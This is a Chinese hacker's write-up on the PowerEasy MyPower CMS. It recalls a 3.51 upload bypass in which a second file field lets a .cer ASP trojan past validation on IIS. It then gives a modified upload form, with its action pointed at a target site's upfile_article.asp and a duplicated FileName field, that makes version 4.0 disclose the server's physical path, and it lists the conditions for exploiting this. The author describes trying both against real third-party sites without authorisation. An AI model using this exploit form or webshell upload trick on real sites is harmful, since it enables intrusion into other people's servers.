爆出动易程序的物理路径
大家还记得动易MY Power Ver 3.51的那个上传cer文件的漏洞吧?那可是n年以前的一个杰作,一定都用它入侵了不少站点了。他利用的就是用
<INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1>
这两句来提交,结果第一个FileName提交的合法文件通过了验证,第二个FileName1竟然绕过了这个验证,之所以可以上传cer,不能上传asp,是因为asp还有验证。关键就是用那两句话绕了过去。(提示:cer文件和asp文件在iis中默认用同一个解释器来解释,就是说相对于用户,服务器怎么执行asp,就怎么执行cer。上传的扩展名为cer的asp木马,一样可以正常使用)
说实话,我有时候喜欢把MY Power和FreePower弄混,虽然有区别,但是我总以为是版本不一样,闹笑话了。我用MY Power Ver 3.51用来上传cer文件的漏洞利用程序(就是那个更改后的htm文件)把地址改为FreePower的upfile_softpic.asp。地址为www.******.com/editor/upfile_softpic.asp。却出现了“频道参数丢失!”这个错误。我当时以为是版本不一样,所以提交的数据也不一样。
在本地用winsock监听数据包,利用asp的空字节漏洞(nc提交用ultraedit修改后的数据)提交之后仍然错误。我想:“这也不行,那个提交cer的也不行,等等!提交cer的不是不行,是版本不一样,那么我也许可以在这个版本上修改“提交上传文件”这个文件的源代码,然后本地提交呢?”
查看http://www.******/editor/upload_article.asp?ChannelID=1源代码
<form action="upfile_article.asp" method="post" name="form1" onSubmit="return check()" enctype="multipart/form-data">
//改上句action="upfile_article.asp"为http://www.******/editor/upfile_article.asp
<input name="FileName" type="FILE" class="tx1" size="20">
<input name="FileName" type="FILE" class="tx1" size="20">(另加一行)
<input type="submit" name="Submit" value="上传" style="border:1px double rgb(88,88,88);font:9pt">
<input name="ImgWidth" type="hidden" id="ImgWidth">
<input name="ImgHeight" type="hidden" id="ImgHeight">
<input name="AlignType" type="hidden" id="AlignType">
<input name="ChannelID" type="hidden" id="ChannelID" value="1">
</form>
大家仔细看看有什么不妥?不错,按漏洞的使用方法,我应该另加的一行为<input name="FileName1" type="FILE" class="tx1" size="20">,但是我粗心大意,忘记了。然后选择了两个文件,前一个是gif,后一个是cer,按照开始提到的规矩来,点上传。
出现错误!但是这个错误好像很好玩,竟然给出了站点的物理路径!
Microsoft VBScript 运行时错误 错误 '800a01c9'
此键已与该集合的一个元素关联
D:/WWWROOT/BIZ******1/WWWROOT/EDITOR/../inc/upfile_class.asp,行 104
我没有因为入侵成功而高兴,反而因为出错了让我激动了一会儿!这个爆出物理路径的错误以前就没有人提到,莫非发现了好东西?赶快到动易主站查看他的客户名单,随便捞了几个站出来,在管理员登陆叶面看看版本,Powered by: MyPower 4.0。然后执行上面的操作,竟然同样爆出了物理路径。这样还是不放心,又去找个几个使用Powered by: MyPower 4.0的黑客安全网站(他们是搞安全的,如果是个已经发现的漏洞,应该会不存在的)。我找的几个都给出了物理路径!激动ing!(难道传说中的黑客都是这样发现新漏洞的?)
于是总结了漏洞的使用条件
1 版本Powered by: MyPower 4.0
2 要登陆后留下Cookies(意思就是可以注册并登陆)
3 inc/upfile_class.asp和upfile_article.asp存在,经测试,凡调用inc/upfile_class.asp的几个文件upfile_article.asp, upfile_softpic.asp等等都可以成功!
4 服务器没有屏蔽Microsoft VBScript 运行时错误的提示信息。(比如华夏的用这种方法会出现“处理 URL 时服务器出错。请与系统管理员联系。”)
利用过程就是上面提到的了。
空虚浪子心